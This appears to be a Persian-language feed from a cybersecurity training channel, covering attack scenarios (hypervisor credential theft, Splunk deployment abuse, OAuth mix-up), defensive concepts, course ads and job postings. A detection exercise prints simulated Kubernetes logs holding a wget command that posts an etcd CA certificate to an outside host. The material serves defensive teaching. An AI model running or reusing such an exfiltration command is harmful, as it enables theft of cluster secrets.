آکادمی آموزش روزبه 📚

25 July 2025 20:42

درگیر تدریس کلاس فشرده افتای SOC هستم لذا نمیرسم مطالب اینجا بگذارم 💐✨🙏

آکادمی آموزش روزبه 📚

24 July 2025 11:21

هشدار مهم : شیر پوینت هاتون رو دریابید خیلی داره مورد حمله واقع میشه

CVE 2025-53770

آکادمی آموزش روزبه 📚

23 July 2025 18:20

حمله Hypervisor Heist:

عبور خاموش از تمام خطوط دفاعی ویندوز و سرقت اعتبارنامه‌ها از VMware vSphere

در فضای امروز امنیت سایبری، بیشتر تمرکز سازمان‌ها روی حفاظت از سیستم‌عامل‌ها، سرویس‌ها و اپلیکیشن‌هاست. اما مهاجمان پیچیده‌تر سراغ لایه‌ای می‌روند که اغلب مورد غفلت قرار می‌گیرد:

هایپروایزر. یکی از سناریوهای حمله پیشرفته و به‌شدت خطرناک همین حمله Hypervisor Heist است که به ما نشان می‌دهد چطور یک تهدید می‌تواند خارج از دید کامل EDR و SIEM، اعتبارنامه‌های دامین کنترلر را سرقت کند.

شرح سناریوی حمله
در این حمله، مهاجم با دسترسی به vCenter (یا Hypervisor)، مراحل زیر را اجرا می‌کند:
شناسایی و خاموش‌کردن ماشین مجازی دامین کنترلر
مهاجم از vCenter ماشین دامین کنترلر را شناسایی و خاموش می‌کند تا دیسک آن باز نشود و دسترسی بگیرد.
جداسازی دیسک مجازی (.vmdk)
دیسک مجازی دامین کنترلر را از VM جدا کرده و به یک ماشین مجازی دیگر متصل می‌کند.

دسترسی آفلاین به دیتای حساس
در ماشین جدید، فایل NTDS.dit (بانک اطلاعاتی Active Directory) را کپی و استخراج می‌کند و حتی فایل‌ها و Credentialهای Kerberos و Hashها را استخراج می‌کند.

بازگشت به وضعیت عادی
نهایتاً دیسک مجازی را به همان VM اولیه برمی‌گرداند، VM را روشن می‌کند—انگار هیچ اتفاقی نیفتاده!

چرا این حمله را “Heist” می‌نامیم؟
پنهان‌کاری کامل: چون تمام عملیات روی دیسک آفلاین و بیرون از سیستم‌عامل ویندوز انجام می‌شود، محصولات امنیتی مانند EDR، XDR یا حتی SIEM هرگز متوجه حذف و کپی شدن NTDS.dit نمی‌شوند.
دور زدن هر نوع Rule شبکه: چون انتقال داده معمولاً از طریق سرور مدیریت (vCenter یا VCSA) انجام می‌شود، نفوذگر می‌تواند محدودیت‌های لایه شبکه را دور بزند مگر اینکه به‌درستی روی‌داده یا مانیتورینگ شود.
غفلت امنیتی سازمان‌ها: خیلی از سازمان‌ها هنوز هایپروایزر و زیرساخت مدیریت VMها را مانند سرویس‌های حیاتی، جدی نمی‌گیرند. در حالی که کنترل این لایه مساوی با کنترل همه چیز است.
راهکارها و توصیه‌ها
جداسازی شبکه مدیریت هایپروایزرهیچ دسترسی غیرضروری، اینترنتی یا حتی داخلی بدون کنترل نباید به vCenter و ESXi داده شود.
فعال‌سازی مانیتورینگ دقیق برروی vCenter، ESXi و Hypervisor APIsSIEM و SOAR باید آلارم‌های خاص مانند جدا کردن یا Add کردن دیسک، خاموش/روشن کردن غیرمنتظره VM را تحلیل کند.
رمزگذاری دیسک‌های VM و استفاده از TPM مجازیحتی اگر دیسک جدا شد، فقط با کلیدهای مدیریتی قابل بازیابی باشد.
استفاده از حساب‌های با کمترین سطح دسترسی و MFA برای مدیریت هایپروایزر
آموزش تیم عملیاتی و SOC در مورد TTPهای attack surface لایه مجازی‌سازی


#آکادمی_روزبه
#تجربه #درس_آموخته

آکادمی آموزش روزبه 📚

22 July 2025 09:13

بحث Network Level Authentication (NLA) چیست؟

این موضوع یک ویژگی امنیتی است که در پروتکل RDP (نسخه‌های 6.0 و جدیدتر) معرفی شد. هدف اصلی آن این است که هویت کاربر را قبل از برقراری کامل یک جلسه Remote Desktop و بارگذاری صفحه لاگین ویندوز، تأیید کند.

به زبان ساده‌تر، به جای اینکه کامپیوتر مقصد (سرور) تمام منابع خود را برای ایجاد یک نشست کامل گرافیکی (Session) صرف کند و سپس از شما نام کاربری و رمز عبور بپرسد، NLA این فرآیند را معکوس می‌کند. اول هویت شما را در سطح شبکه تأیید می‌کند و تنها در صورت موفقیت‌آمیز بودن احراز هویت، اجازه می‌دهد که جلسه کامل برقرار شود.

این ویژگی از یک سرویس امنیتی به نام CredSSP (Credential Security Support Provider) استفاده می‌کند.


مزایای این روش:

امنیت بسیار بالاتر: از حملات DoS و Brute-Force جلوگیری می‌کند، زیرا مهاجمان حتی به صفحه لاگین هم نمی‌رسند که بخواهند رمزهای مختلف را تست کنند.
بهینه‌سازی منابع سرور: منابع سیستم فقط برای کاربران تأیید شده مصرف می‌شوند که باعث افزایش کارایی و پایداری سرور می‌گردد.
سرعت بالاتر در اتصال: چون فرآیند احراز هویت سبک و سریع است، اتصال برای کاربران قانونی سریع‌تر برقرار می‌شود.

#آکادمی_روزبه

آکادمی آموزش روزبه 📚

21 July 2025 10:03

خودت دریافتی رو پیشنهاد بده !

قراره یه کارشناس به تیم اضافه کنیم که هم رد بلد باشه هم بلو . خوببببب حملات رو بشناسه .

جوان باشه بهتره چون قراره حسابی درگیر بشه با تی شوت و حل مساله در تنظیمات ابزارهای کشف

برو لینکدینم در pv خبر بده تا پروفایل لینکدین رو ببینم صحبت کنیم بیای کمک .

ولی واقعا سواد و مهارت مهمه

خودت هم بگی چقدر میصرفه بیای
چون قراره با یه Talent کار کنیم

تمام.

آکادمی آموزش روزبه 📚

20 July 2025 18:15

**نظر شما Anonymous بی نام است

آکادمی آموزش روزبه 📚

20 July 2025 13:23

خرده اطلاعات پوشالی

برخی تحلیل ها فقط نوشته می‌شوند که تعدادی کلمه را روی کاغذ بریزند

اما خوب که می‌خوانی میبینی چیز جدید و منطقی گفته نمیشه

نمونه اش این گزارش هست که مولف ظاهرا دکترا دارد اما حیف از وقتی که برای خواندن گزارش گذاشته شود

چرا وقتی چیزی نمی‌دانیم اصلا دست به قلم میشویم ؟
واقعا چیزی از این گزارش دستگیر شما شد؟
فقط مروری بر برخی مطالب درسی بود که بعنوان گزارش حمله درج شده است

آکادمی آموزش روزبه 📚

19 July 2025 20:07

در فریم ورک NIST-CSF ما سه مقوله مهم داریم : تایر +پروفایل +کور

کور که کنترل های ماهستند

اما تایر و پروفایل چرا لازم است ؟

پروفایل اسنپ شات زمانی وضعیت سازمان در حال و آینده است
اما تایر چیست ؟سنجش بلوغ فرآیندها یا «چگونه و با چه کیفیتی انجام می‌شود؟»

واضح:

داشتن یک «پروفایل کامل» به این معناست که سازمان به درستی تشخیص داده است که «چه» کنترل‌های امنیتی‌ای برای حفاظت از دارایی‌هایش ضروری است. این سازمان ممکن است روی کاغذ، تمام زیرمجموعه‌های لازم از چارچوب NIST مانند مدیریت دسترسی ( PR.AC) یا حفاظت از داده‌ها (PR.DS) را در پروفایل مطلوب خود گنجانده باشد. اما اگر این سازمان در Tier 1 (Partial) باقی بماند، اجرای این کنترل‌ها به صورت موردی (ad−hoc) و بدون ساختار خواهد بود.
در چنین وضعیتی، برنامه امنیتی به شدت شکننده است، زیرا به دانش یا تلاش یک یا چند فرد خاص وابسته است، نه به یک فرآیند سازمانی. رویکرد آن کاملاً واکنشی خواهد بود؛ یعنی به جای پیش‌گیری، تنها پس از وقوع یک حادثه امنیتی به آن پاسخ می‌دهد. این امر باعث می‌شود برنامه امنیتی غیرقابل اعتماد باشد، زیرا هیچ تضمینی برای اجرای مداوم و یکپارچه کنترل‌ها وجود ندارد.
بنابراین، برای ساختن یک دژ مستحکم سایبری، صرفاً چیدن آجرهای صحیح (تکمیل پروفایل) کافی نیست؛ بلکه ملات و مهندسی که این آجرها را به هم پیوند می‌دهد (ارتقا به Tierهای بالاتر) حیاتی است. دستیابی به امنیت پایدار و مؤثر، مستلزم یک تلاش دوگانه است: تکمیل فهرست کنترل‌ها (پروفایل) و همزمان، نهادینه‌سازی فرآیندهای مدیریتی قابل تکرار و انطباق‌پذیر (Tierهای بالاتر). این دو مفهوم، مانند دو بال یک هواپیما، به طور جدایی‌ناپذیری برای پروازی امن و مطمئن در فضای پرخطر سایبری ضروری هستند.


ثبت نام دوره دوم CISSP در سال 1404 واتس اپ و بله 09902857290
برای برخورداری از تخفیف شرکت هامون تسریع در ثبت نام ضروری است www.haumoun.com

آکادمی آموزش روزبه 📚

19 July 2025 12:02

چه خبره واقعا

دیده بودم فرد واسه استخدام کردن در SOC اکانت جیمیل بده اما ندیده بودم شرکت فعال در حوزه SOC بگه رزومه بفرستید به یه هاستینگ عمومی !!

عیبه بخدا

قبل از سواد امنیت و کشف نفوذ ، باید روحیه امنیتی داشت

🔴این عمل یعنی تجمیع اطلاعات خاص متخصصان امنیت در پلتفرم خارجی؛ مصداق جمع آوری و انتشار اطلاعات برای دشمن میتونه قلمداد بشه

آکادمی آموزش روزبه 📚

18 July 2025 18:20

شبیه‌سازی و تست Scheduled Taskهای پنهان: ابزاری نوین برای تحلیلگران امنیتی

در دنیای امنیت سایبری، Scheduled Taskها یکی از روش‌های رایج مهاجمان برای اجرای نامحسوس کد مخرب در سیستم‌های ویندوز هستند. بسیاری از این Taskها چنان ماهرانه تنظیم می‌شوند که به راحتی از چشم ابزارهای تشخیص یا تحلیلگران شبکه پنهان می‌مانند. به همین دلیل، شبیه‌سازی رفتار این گونه Taskها می‌تواند به بهبود دتکشن و افزایش آگاهی تیم‌های دفاعی کمک شایانی کند.

معرفی ابزار Defender Utility Drop

ابزار جدیدی که اخیراً توسط یکی از پژوهشگران امنیتی منتشر شده، یک اسکریپت PowerShell است که با الهام از تحقیقات Binary Defense توسعه یافته است. این ابزار امکان شبیه‌سازی انواع سناریوهای پیچیده و دستکاری‌شده مربوط به Scheduled Taskها را فراهم می‌کند تا مدافعان بتوانند کیفیت قوانین و ابزارهای تشخیصی خود را آزمون کرده و نقاط ضعف را شناسایی نمایند.

چه قابلیت‌هایی دارد؟

این اسکریپت شامل تست‌های اتمیک مانند موارد زیر است:
- حذف یا جعل SD Value: شبیه‌سازی حذف یا دستکاری مقادیر Security Descriptor برای ردگیری رفتار ابزارهای امنیتی.
- سوءاستفاده از SDDL: بررسی مقاومت سیستم مقابل Deny-Access یا Abuse Policyها.
- تسک بدون لاگ: اجرای Taskهایی که عملاً ردی در Event Log ایجاد نمی‌کنند و شناسایی آنها دشوار است.
- دستکاری رجیستری و کلیپ‌بورد: ایجاد تغییرات مشکوک در مقادیر رجیستری یا کلیپ‌بورد برای تحلیل تاثیر این رفتارها روی ابزارهای EDR.
- تست‌های Sysmon: ارزیابی کارایی Ruleهای Sysmon در شناسایی سناریوهای فوق.
- نمایش خروجی ASCII برای تعامل بهتر و جذاب‌تر بودن تست‌ها.

کاربردها

این ابزار برای افراد زیر کاربرد ویژه دارد:
- تحلیلگران تهدید و محققان امنیتی که روی کشف و تحلیل رفتاری کار می‌کنند.
- ادمین‌ها و تیم‌های SOC که می‌خواهند کیفیت Ruleهای Sysmon یا سایر ابزارهای مانیتورینگ را بهبود دهند.
- افرادی که به دنبال شبیه‌سازی حملات در محیطی کنترل‌شده به سبک Atomic Red Team هستند.

#آکادمی_روزبه
ازجمله ابزارهای دوره های استاد روزبه


https://github.com/MHaggis/notes/blob/master/utilities/HiddenScheduledTasks.ps1

آکادمی آموزش روزبه 📚

17 July 2025 18:19

نکته روز :
حتی اگر هکر با Clear-History تاریخچه پاورشل را پاک کند ، دستورات او در فایل PSReadLine باقی می‌ماند و تیم کشف می‌تواند به آنها دسترسی داشته باشد.

**فقط تایم استمپ ندارد!

#آکادمی_روزبه
مرکز تخصصی CISSP
Www.Roozbeh.academy

آکادمی آموزش روزبه 📚

16 July 2025 21:45

یک گزارشی برای تصمیم سازی در کنار گارتنر

گزارش GigaOm Radar یک گزارش تحلیلی و تصویری است که توسط شرکت تحقیقاتی و تحلیل فناوری GigaOm منتشر می‌شود. این گزارش‌ها برای کمک به رهبران و تصمیم‌گیرندگان حوزه فناوری اطلاعات (IT) طراحی شده‌اند تا بتوانند به سرعت و با دیدی جامع، فروشندگان و راهکارهای موجود در یک بازار فناوری خاص را ارزیابی و مقایسه کنند.

به زبان ساده، GigaOm Radar یک نقشه راهنمای بازار است که به شما نشان می‌دهد کدام شرکت‌ها در یک حوزه مشخص (مثلاً امنیت ابری، مدیریت پایگاه داده، هوش مصنوعی و…) پیشرو هستند، کدام‌ها بازیگران جدید و نوآورند و هر کدام چه نقاط قوت و ضعفی دارند.

گارتنر هنوز وزن و نفوذ بسیار بیشتری در سطح مدیران ارشد اجرایی (C-level) و تصمیم‌گیری‌های کلان سازمانی دارد، اما GigaOm به سرعت در حال کسب اعتبار به عنوان یک منبع تحلیلی معتبر، مدرن و فنی‌تر است، به ویژه در میان مخاطبان فنی و بازارهای نوظهور.


#آکادمی_روزبه
مرکز تخصصی CISSP


نمونه
CrowdStrike Named a Leader in the 2025 GigaOm SIEM Radar Report

https://www.crowdstrike.com/en-us/blog/crowdstrike-named-leader-in-2025-gigaom-siem-radar-report/?blog=&utm_medium=soc&utm_source=lnkd&utm_term=spklr&utm_content=17603898827&utm_campaign=platform%2Fproduct&utm_activation=content%3A+crowdstrike+blog%2Canalyst%3A+other

آکادمی آموزش روزبه 📚

16 July 2025 21:43

از جمله ابزار کلاسهایم

یک اسکریپت PowerShell که برای تست و ارزیابی قابلیت‌های شناسایی و پاسخ (Detection & Response) در محیط‌های Active Directory طراحی شده است. این ابزار به طور خاص دو تکنیک رایج و پرخطر از چارچوب MITRE ATT&CK را به صورت خودکار شبیه‌سازی می‌کند: Kerberoasting (T1558.003) و AS-REP Roasting (T1558.004).



#آکادمی_روزبه
مرکز تخصصی CISSP

https://github.com/MHaggis/notes/blob/master/utilities/ForrestBlizz.ps1

آکادمی آموزش روزبه 📚

14 July 2025 16:08

یه تنظیم گر XDR میخوایم.

حوصله تنظیم کردن و تیون داشته باشه
بتونه تحلیل کنه چه ماژولی کجا باید فعال بشه و چرا ؟
پس باید حملات امنیتی رو بشناسه اونم خوب
مثلا پراسس هالویینگ در ذهنش نفوذ کرده باشه پس بتونه تنظیمی واسه کشف و جلوگیریش انجام بده .

لازم نیست به XDR مسلط باشه همین که به یه EDR مسلط باشه و بفهمه چطور کار میکنه کافیه

و عاشق SOC نباشه چون کار فقط XDR هست.

لازم نیست بگم که دانش سیستم عاملش باید خوب باشه


برای این کار خالص ۶۰ تومن درنظر گرفته شده +مزایای مناسبتی +بیمه تکمیلی و پاداش بهره وری

اگر بلدین بسم الله
بنویسین کارشناس XDR و بفرستین رزومه رو hr@haumoun.com

هیچ زیاد سابقه هم نمیخواد
کار رو بلدی میای مصاحبه کتبی و عملی


✅️لطفا فوروارد کنید تا دیده بشه

آکادمی آموزش روزبه 📚

11 July 2025 21:19

دوستی میگفت:
چرا اینقدر مطلب مینویسی و تند تند پست میکنی؟

گفتم دنیای امنیت رحم نداره
نخونی ؛ حذف میشی
و قبل از حذف مجبور میشی به شغل های پایین تر تن بدی!!

آکادمی آموزش روزبه 📚

24 July 2025 14:11

به پایان آمد این دفتر ...
حکایت همچنان باقی

امروز جلسه آخر دوره بهار CISSP
الحمدالله
تمام.

۲ مرداد ماه ۱۴۰۴ تهران

آکادمی آموزش روزبه 📚

23 July 2025 18:58

تمرین برای مهندسان کشف

Detection Engineer


I0723 21:12:45.345678 1 audit.go:277] "Request received"
verb="create"
URI="/api/v1/namespaces/default/pods"
user="system:serviceaccount:devops:trusted-app"
sourceIP="192.168.10.239"



2025-07-23 21:13:02.991423 I | etcdserver: request: /v3/kv/range size:829
username=system:serviceaccount:devops:trusted-app
remote=192.168.10.239



I0723 21:13:10.564321 1 audit.go:277] "Create Pod" as "sleep-attack-459f9"
using serviceaccount="trusted-app"
image="busybox"
command="wget http://10.10.10.10/exfil --post-file /etc/kubernetes/pki/etcd/ca.crt"


Jul 23 21:13:15 node-4 kubelet[1217]: Created pod: sleep-attack-459f9 with image busybox
Jul 23 21:14:02 node-4 kubelet[1217]: Deleted pod: sleep-attack-459f9


{
"src_ip": "192.168.10.239",
"dst_ip": "10.10.10.10",
"src_port": 43216,
"dst_port": 80,
"payload_size": "2.3MB",
"timestamp": "2025-07-23T21:13:18Z"
}


حالا فکر کنید به اینکه چه خبره ؟!




ثبت نام دوره آمادگی آزمون CISSP
با 30 درصد تخفیف شرکت هامون
واتس اپ و بله 09902857290
#مرکز_تخصصی_CISSP

آکادمی آموزش روزبه 📚

22 July 2025 15:55

فارنزیک Kubernetes

بازیابی رد پای حملات، حتی پس از پاک شدن پادها و آبجکت‌ها


وقتی مهاجم وارد کلاستر Kubernetes می‌شود و پس از اجرای payload یا دسترسی، سعی می‌کند آثار حمله‌اش را با حذف podها، secrets یا حتی namespace پاک کند، خیلی‌ها فکر می‌کنند دیگر اثری از نفوذ باقی نمی‌ماند.

اما…

تمام state کلاستر در etcd ذخیره می‌شود و اگر به موقع (و بی‌درنگ) یک snapshot از etcd تهیه شود ، می‌توانیم اطلاعات مربوط به آبجکت‌هایی که مدتی در کلاستر بودند (حتی اگر حذف شده باشند) را در تاریخچه و باقی‌مانده‌های etcd بازیابی و آنالیز کنیم.

مواردی که می‌شود پیداکرد:

موضوع Manifests حذف‌شده (yamlها)، یعنی کدهایی که مهاجم برای استقرار ابزار/ویروسش آورده است.
بحث Secrets، حتی اگر به ظاهر حذف شده باشند، در Snapshot ممکن است همچنان موجود باشد!
و eventها و متادیتاهایی مثل uid، timestamp ساخت و حذف، annotationهای مخفی و…

کاربرد عملی فارنزیک:

بازیابی کانفیگ و secrets بعد از حادثه و قبل از دستکاری کامل توسط مهاجم
مشخص کردن دقیق مسیر و قدم‌های مهاجم (TTPهای حمله)
یافتن شواهدی از ابزارهای یک‌بار مصرف (ephemeral pods)، مثل بات‌نت یا cryptominerهایی که سریع اسپین و حذف می‌شوند.


گاهی حتی بعد از حذف آبجکت‌ها، اثر انگشت (hashها، UIDها و annotationهای auto-generated) تا مدت‌ها به صورت reference در etcd باقی می‌ماند. این، یک شانس طلایی برای فارنزیک کار حرفه‌ای است!


#آکادمی_روزبه


از فرصت های خاص:
ثبت نام دوره حرفه ای CISSP
با تخفیف ۳۰ درصدی شرکت هامون
فقط اشخاص ساکن ایران
www.haumoun.com
واتس اپ و بله ۰۹۹۰۲۸۵۷۲۹۰

آکادمی آموزش روزبه 📚

21 July 2025 11:28

#آکادمی_روزبه
09902857290
Www.haumoun.com

آکادمی آموزش روزبه 📚

20 July 2025 21:40

دوستانی که علاقمند به سرفصل دوره مدیریت بحران هستند این مستند رو ببینند
یک پنجم دوره در خصوص این مطالب است
البته دوره کارگاه های فنی هم دارد منجمله فارنزیک
در این دوره با آخرین حملات روز ایران و نحوه بحران زدایی آشنا میشوید

آکادمی آموزش روزبه 📚

20 July 2025 17:48

نسخه جدید Attack Flow




این Attack Flow به متخصصین کشف کمک می‌کند تا فرآیندهای واقعی حمله را مدل کنند، «فلو»ها را رسم کنند و بهم‌پیوستگی تکنیک‌های مختلف را بهتر درک کنند. این کار باعث می‌شود کشف، دفاع و پاسخ به حملات هدفمند، ساختاریافته‌تر و علمی‌تر انجام شو


#آکادمی_روزبه

https://center-for-threat-informed-defense.github.io/attack-flow/

آکادمی آموزش روزبه 📚

20 July 2025 11:36

😢کارشناسان شبکه و امنیت لطفا رزومه بدین تو گوگل ذخیره بشه

داستانی پر تکرار

راستی قشنگ بنویسین تو هر شرکت و سازمان چیو چطور کانفیگ کردین کدوم برند بوده و به چیا اکسس داشتین!!!!!

آکادمی آموزش روزبه 📚

19 July 2025 19:01

میدونی لایسنس فایروالت فعال نباشه یا اکسپایر بشه ،ممکنه رولهات کار نکنند و هرچی بستی ، بریزه تو اینترنت !!

لایسنس منجمنت! +اسکن از بیرون یادت نره

#آکادمی_روزبه

آکادمی آموزش روزبه 📚

19 July 2025 08:46

بررسی Privacy Impact Rating در طراحی نرم‌افزار ( دوره CISSP) و وضعیت آن در ایران

در دوره CISSP و اصول امنیت اطلاعات، Privacy Impact Rating (PIR) یا «درجه تأثیر بر حریم خصوصی» شاخصی است که مشخص می‌کند یک نرم‌افزار یا سیستم تا چه اندازه ممکن است حریم خصوصی کاربران را تحت تأثیر قرار دهد.



این مساله یکی از مقولاتی از که در ایران بدان توجه نمیشود.



مراحل PIR در طراحی نرم‌افزار:

شناسایی داده‌های حساس:

بررسی اینکه چه داده‌هایی جمع‌آوری و پردازش می‌شود (مثلاً نام، شماره ملی، ایمیل، اطلاعات پزشکی و…).

ارزیابی ریسک:

تحلیل اینکه هر نوع داده چقدر حساس است و اگر به بیرون نشت کند یا سوءاستفاده شود، چه پیامدهایی خواهد داشت.

تعیین درجه تاثیر:

بسته به نوع داده و کاربرد نرم‌افزار، یک رتبه (معمولاً کم، متوسط، بالا یا بالغ‌تر با عدد) برای تأثیر روی حریم خصوصی تعیین می‌شود.

تدوین کنترل‌ها:

بر اساس این ارزیابی، باید کنترل‌های فنی و اجرایی مانند رمزنگاری، دسترسی محدود و لاگ‌گیری را مشخص و اعمال کرد.

هدف PIR کمک به تصمیم‌گیری شفاف درباره طراحی، توسعه و پیاده‌سازی نرم‌افزار با رعایت حقوق خصوصی کاربران است. همچنین لازم است که PIR به روزرسانی شود و در هر تغییر اساسی، مجدداً بررسی شود.



پیامدهای نبود PIR و رعایت‌نکردن حریم خصوصی در ایران

در ایران، به دلایل مختلف (نبود مقررات جدی، ضعف فرهنگ سازمانی، مشکلات تکنیکی، …) معمولاً PIR رعایت نمی‌شود. این موضوع چند پیامد جدی دارد:

افزایش رخدادهای نقض داده:

داده‌های حساس کاربران مرتباً به بیرون نشت می‌کنند (نمونه: لو رفتن اطلاعات سامانه‌ها یا فروش اطلاعات در اینترنت).

کاهش اعتماد کاربران:

مردم اعتماد خود را به اپلیکیشن‌ها و سرویس‌های ایرانی از دست می‌دهند و ترجیح می‌دهند از نرم‌افزارهای خارجی یا روش‌های آفلاین استفاده کنند.

سوءاستفاده و کلاهبرداری:

شناسایی افراد، جعل هویت، و مقاصد مجرمانه به راحتی اتفاق می‌افتد چون داده‌ها به خوبی حفاظت نشده‌اند.

مشکلات حقوقی و اعتباری برای شرکت‌ها:

شرکت‌ها و سازمان‌ها ممکن است در سطح بین‌المللی اعتبار خود را از دست بدهند یا با تحریم و محرومیت از خدمات روبه‌رو شوند.

عدم تطابق با استانداردهای جهانی:

سازمان‌ها امکان همکاری با بخش بین‌الملل یا ورود به بازارهای جدید را از دست می‌دهند چون نمی‌توانند الزامات بین‌المللی حریم خصوصی (مثل GDPR) را پوشش دهند.

#آکادمی_روزبه

آکادمی آموزش روزبه 📚

18 July 2025 09:46

امکان تسخیر شبکه شما از طریق اسپلانک

✍روزبه نوروزی


نفوذ از Splunk Deployment Server به Endpointها امکان‌پذیر است، زیرا مهاجم از قابلیت‌های اصلی و طراحی‌شده‌ی خود سیستم علیه آن استفاده می‌کند، نه لزوماً از یک آسیب‌پذیری نرم‌افزاری.

این حمله بر چهار اصل استوار است:

۱. مدیریت متمرکز: Deployment Server به عنوان یک “نقطه کنترل واحد” عمل می‌کند. تسلط بر آن به معنای تسلط بر تمام کلاینت‌های متصل (Forwarderها) است.

۲. مدل اعتماد: کلاینت‌ها به صورت کورکورانه به دستورات و اپلیکیشن‌هایی که از Deployment Server دریافت می‌کنند، اعتماد و آن‌ها را اجرا می‌کنند.

۳. قابلیت اجرای اسکریپت: Splunk به مدیران اجازه می‌دهد تا اسکریپت‌هایی را روی Endpointها اجرا کنند (قابلیت Scripted Inputs). مهاجم از همین ویژگی قانونی برای اجرای کدهای مخرب خود بهره می‌برد.

۴. دسترسی بالا: از آنجا که Forwarderها معمولاً با دسترسی بالا (root در لینوکس یا SYSTEM در ویندوز) اجرا می‌شوند، اسکریپت مخرب نیز با همین سطح دسترسی اجرا شده و کنترل کامل Endpoint را به مهاجم می‌دهد.

در واقع، این حمله یک سوءاستفاده هوشمندانه از یک ابزار مدیریتی قدرتمند است که در آن، اعتماد و کارایی سیستم به یک ضعف امنیتی تبدیل می‌شود.

راهکار مقابله : حفاظت مؤثر از Deployment server با روش دفاع در عمق



**این روش مختص اسپلانک نیست و هر برنامه ای از این روش در معماری خود استفاده کند شامل این مساله میگردد .

**این روش از تسخیر نیاز به پیش زمینه هایی دارد پس دلیل نمی‌شود بخواهیم اسپلانک را دارای مشکل بدانیم و اقدام به حذف آن کنیم.
بهتر است همیشه نقطه ضعف و اندازه آنرا بدانیم و برایش راهکار داشته باشیم.

#آکادمی_روزبه

Www.Roozbeh.academy

آکادمی آموزش روزبه 📚

16 July 2025 21:46

یک تغییر نگرش ضروری در مهندسی کشف: چرا باید استراتژی شناسایی خود را هوشمندتر کنیم؟

همه‌ی ما که در دنیای امنیت سایبری فعالیت می‌کنیم، با چارچوب MITRE ATT&CK زندگی می‌کنیم. این ماتریس به زبان مشترک ما برای توصیف رفتار مهاجمان تبدیل شده است. اما اغلب، در تلاش برای «پوشش دادن ماتریس»، در انبوهی از تکنیک‌ها و زیرتکنیک‌ها غرق می‌شویم. رویکرد رایج این است: یک تکنیک را انتخاب کن، برایش یک قانون شناسایی بنویس، و به سراغ بعدی برو. این روش، اگرچه ارزشمند است، اما همیشه کارآمد و پایدار نیست.

اخیراً مقاله‌ای از خود تیم MITRE ATT&CK با عنوان «استراتژی‌های شناسایی هوشمندتر» منتشر شد که به نظرم یک تلنگر اساسی به این رویکرد سنتی می‌زند. نکته‌ی اصلی و جدید این مقاله، نه معرفی یک ابزار یا تکنیک جدید، بلکه ارائه یک مدل ذهنی متفاوت برای ساختن دفاع‌هایمان است؛ مدلی که از پایین به بالا ساخته می‌شود و تمرکز را از «تکنیک‌های خاص» به سمت «فرصت‌های مشاهده‌پذیری» شیفت می‌دهد.

مشکل رویکرد سنتی: دویدن دنبال جزئیات

ادامه و متن کامل مقاله را می‌توانید در پست های بعدی بخوانید

#آکادمی_روزبه
مرکز تخصصی CISSP

https://medium.com/mitre-attack/smarter-detection-strategies-in-attack-7e6738fec31f

آکادمی آموزش روزبه 📚

16 July 2025 21:44

دوستانی که فرصت حضور در کلاسهایم را ندارند این منبع را برای خودآموزی داشته باشند


#آکادمی_روزبه
مرکز تخصصی CISSP

https://github.com/S3N4T0R-0X0/APT-Attack-Simulation

آکادمی آموزش روزبه 📚

15 July 2025 21:48

شکار بد افزار از طریق کانال‌های جانبی (Side-Channel Analysis): وقتی بدافزار سکوت می‌کند

روزبه نوروزی


هوشمندانه‌ترین بدافزارها می‌دانند که هرگونه فعالیت شبکه‌ای یا تغییر در فایل سیستم، ردپایی از خود به جای می‌گذارد. بنابراین، ممکن است برای مدتی طولانی کاملاً غیرفعال بمانند تا زمانی که یک شرط بسیار خاص (مثلاً اتصال یک USB با شماره سریال مشخص) محقق شود. چطور می‌توان چنین بدافزار خفته‌ای را تحلیل کرد؟
رویکرد من: ما به آنچه بدافزار “انجام می‌دهد” نگاه نمی‌کنیم، بلکه به “اثرات جانبی وجودش” نگاه می‌کنیم.

تحلیل حافظه نهان پردازنده (CPU Cache Analysis): تکنیک‌هایی مانند Flush+Reload به ما اجازه می‌دهند بفهمیم که آیا یک بخش خاص از کد (مثلاً یک تابع در یک DLL سیستمی) توسط یک پروسه دیگر اجرا شده است یا خیر، بدون اینکه نیازی به دیباگ کردن آن پروسه داشته باشیم.
سناریو: ما به یک تابع رمزنگاری در crypt32.dll مشکوک هستیم. ابتدا خطوط کش مربوط به آن تابع را از حافظه نهان CPU پاک می‌کنیم (Flush). سپس منتظر می‌مانیم. بعد از مدتی، دوباره زمان دسترسی به آن خطوط را اندازه‌گیری می‌کنیم (Reload). اگر زمان دسترسی بسیار کم باشد، یعنی پروسه دیگری (بدافزار ما) آن تابع را فراخوانی کرده و آن را دوباره به کش آورده است! ما بدون هیچ API hooking یا دیباگینگ، متوجه فعالیت پنهانی بدافزار شدیم.



#آکادمی_روزبه
مرکز تخصصی CISSP

آکادمی آموزش روزبه 📚

12 July 2025 12:12

حمله Mix-Up Attack یکی از حملاتی است که بسیاری از توسعه‌دهندگان و حتی مدیران امنیتی نسبت به آن آگاه نیستند، اما در معماری‌هایی با احراز هویت چندگانه (Multi-Provider OAuth/OIDC) می‌تواند تهدید جدی ایجاد کند.
📌حمله Mix-Up Attack به زبان ساده:
سناریو چیست؟
فرض کنید اپلیکیشن یا سایت شما به چند OAuth Provider وصل می‌شود (مثلاً هم Facebook، هم Google، هم Microsoft برای ورود کاربران). وقتی کاربر روی “ورود با گوگل” کلیک می‌کند، و همزمان Provider دیگری هم در سیستم هست، اگر validation سمت backend درست انجام نشود، امکان دارد یک توکن از Provider A (مثلاً گوگل) را به provider B (مثلاً فیس‌بوک) بدهند—یا عمداً به سرور بیاورند—و سرور شما فقط به وجود یک توکن اکتفا کند و نفهمد این توکن متعلق به Provider درست نیست.
مسیر حمله:
کاربر انتخاب می‌کند وارد سایت شود (مثلاً با Provider A).
مهاجم یا کاربر malicious، جریان OAuth را با Provider B (مورد نظر خودش) انجام می‌دهد اما در Callback پارامتر Redirect را طوری دستکاری می‌کند که توکن Provider B به جای Provider A به سرور شما ارائه شود.
اگر validate سمت سرور بر اساس Issuer (iss claim) و Audience (aud claim) به درستی انجام نشود، سرور Auth شما شاید این توکن را معتبر بپذیرد، در حالی که اصلاً از Provider مورد انتظار‌تر نیامده!
نتیجه چیست؟
ممکن است attacker بتواند با توکن خودش از Provider دیگر وارد اکانت کاربر در سیستم شود (user impersonation).

🔒 چطور جلویش را بگیریم؟
۱. اعتبارسنجی Issuer (iss claim)
در تمام JWTهایی که دریافت می‌کنید، باید مقدار iss (issuer) را چک کنید که دقیقا مال همانی است که کاربر انتخاب کرده (مثلاً https://accounts.google.com، نه چیز دیگر).
۲. بررسی Audience (aud claim)
حتماً مطمئن شوید aud همان Client IDای است که واقعاً مال سرویس شما است و متعلق به Provider صحیح است.
